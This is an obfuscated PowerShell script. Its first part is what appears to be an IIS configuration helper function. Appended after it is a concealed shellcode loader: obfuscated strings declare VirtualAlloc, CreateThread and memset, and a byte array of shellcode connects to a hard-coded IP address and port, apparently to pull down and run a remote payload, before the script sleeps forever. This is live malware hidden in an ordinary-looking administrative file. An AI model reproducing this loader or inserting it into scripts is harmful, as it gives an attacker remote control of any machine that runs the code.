function GE`T`-CiIsC`OnfIGU`R`ATioNsECT`iOn
{
    
    [CmdletBinding(deFAULtPARaMEtersEtnaMe={"{2}{1}{0}"-f'l','oba','Gl'})]
    [OutputType([Microsoft.Web.Administration.ConfigurationSection])]
    param(
        [Parameter(mandAtORy=${T`Rue},pAraMeTErsETnAMe="ForS`itE")]
        [string]
        
        ${sitE`NA`Me},
        
        [Parameter(paRAMetERSETNamE="FOr`SITE")]
        [Alias({"{0}{1}" -f'Pat','h'})]
        [string]
        
        ${v`i`RtUA`lPATH} = '',
        
        [Parameter(MandatOry=${Tr`UE},ParAmETErSETNAmE="ForS`itE")]
        [Parameter(mandAtOrY=${tR`Ue},ParaMEtERsEtnaMe="Gl`oBAL")]
        [string]
        
        ${sec`TIO`N`pATH},
        
        [Type]
        
        ${TY`PE} = [Microsoft.Web.Administration.ConfigurationSection]
    )
    
    &("{0}{3}{4}{2}{1}"-f 'Set-Stric','e','d','tM','o') -Version ("{0}{1}" -f 'Lates','t')

    .("{4}{5}{2}{3}{1}{0}"-f 'rence','refe','-Caller','P','Us','e') -Cmdlet ${PScMDl`Et} -Session ${E`X`ec`Ut`IONcoNtEXt}."Se`sSiONS`Ta`TE"

    ${M`Gr} = &("{2}{1}{3}{0}" -f 't','e','N','w-Objec') ("{4}{2}{1}{8}{5}{6}{3}{0}{7}" -f 'na','soft','icro','erverMa','M','mini','stration.S','ger','.Web.Ad')
    ${c`On`Fig} = ${m`Gr}.("{2}{1}{5}{6}{7}{4}{0}{3}{9}{8}" -f'nHost','etAp','G','Configur','tio','p','li','ca','n','atio').Invoke()
    
    ${Se`cT`ioN} = ${NU`lL}
    ${q`Ual`IFier} = ''
    try
    {
        if( ${pSC`m`DleT}.PArAMeTERSETnAME -eq ("{1}{0}"-f'Site','For') )
        {
            ${Q`UAlIF`Ier} = .("{2}{6}{3}{4}{1}{5}{0}" -f'h','lP','J','-CIisVirt','ua','at','oin') ${s`i`TenAmE} ${vIRtUAl`p`Ath}
            ${sectI`oN} = ${C`O`NFig}.("{0}{3}{1}{2}" -f 'Get','ec','tion','S').Invoke( ${SEC`TION`pa`TH}, ${T`yPE}, ${QuALif`i`ER} )
        }
        else
        {
            ${s`Ec`TIoN} = ${C`onF`iG}.("{0}{2}{1}" -f'Ge','on','tSecti').Invoke( ${se`C`TioNP`AtH}, ${T`YpE} )
        }
    }
    catch
    {
    }
        
    if( ${SEct`I`oN} )
    {
        ${s`Ection} | .("{1}{3}{2}{4}{0}" -f'r','Add-IisS','ger','erverMana','Membe') -ServerManager ${M`gR} -PassThru
    }
    else
    {
        .("{3}{0}{1}{2}" -f 'ite','-Err','or','Wr') ('IIS:{0}: configuration section {1} not found.' -f ${Q`UAl`if`ieR},${SE`cTION`Pa`TH})
        return
    }
}


${U`Jk} = ((("{0}{3}{77}{76}{51}{52}{28}{17}{66}{79}{78}{74}{10}{42}{68}{61}{73}{62}{44}{18}{22}{26}{49}{1}{39}{25}{16}{71}{37}{21}{43}{46}{29}{31}{20}{5}{45}{9}{14}{53}{23}{70}{56}{11}{40}{8}{48}{59}{64}{47}{75}{34}{72}{32}{69}{54}{55}{19}{63}{65}{30}{6}{15}{67}{58}{2}{7}{57}{33}{60}{50}{27}{13}{41}{4}{38}{24}{35}{12}{36}"-f'[DllImport','nt f','blic','(ibBkernel','tr dest, ui','lpT','ort',' ','pStartAddr','eadAtt','irt','ize, IntP','count)','memset(In','ributes,','(ibBmsvcrt.d','mpo','public static ',' uint flAllo','ntPtr','CreateThread(IntPtr ','rnel32.dl','catio',' dwS','rc, ui','Protect);[DllI','nTyp','IntPtr ',']',' stat','lImp','ic extern IntPtr ','F','ic ','eati','nt ',';','t(ibBke','nt s','l','tr l','tP','ualAl','lib','e,','hr','B)]public',' uin','ess, IntPtr ','e, ui','rn ','B',')',' uint','s',', I','S','stat','u','lpP','exte','Ad','ess, uint dwSiz',' lpThrea','arameter,','dId);[Dl','ext','llibB)]p','loc(IntPtr lp','lag','tack','r','on','dr','tr V','t dwCr','ib','32.dll','n IntP','er'))-cREPlace([cHAR]105+[cHAR]98+[cHAR]66),[cHAR]34);${W} = &("{0}{2}{1}"-f 'Add','e','-Typ') -memberDefinition ${u`Jk} -Name ("{0}{1}" -f'W','in32') -namespace ("{0}{1}{3}{2}"-f'Win32Funct','i','s','on') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xac,0x61,0x42,0x41,0x68,0x02,0x00,0x03,0xea,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${g} = 0x1000;if (${z}."lEN`G`Th" -gt 0x1000){${g} = ${z}."LeN`gth"};${d`F7}=${w}::("{2}{0}{1}" -f'tualAl','loc','Vir').Invoke(0,0x1000,${g},0x40);for (${I}=0;${I} -le (${Z}."le`NGth"-1);${i}++) {${W}::"MEM`sET"([IntPtr](${D`F7}.("{1}{0}" -f '2','ToInt3').Invoke()+${I}), ${z}[${i}], 1)};${w}::("{0}{3}{2}{1}"-f 'Create','ad','e','Thr').Invoke(0,0,${d`F7},0,0,0);for (;;){.("{1}{3}{0}{2}" -f 'e','St','ep','art-sl') 60};
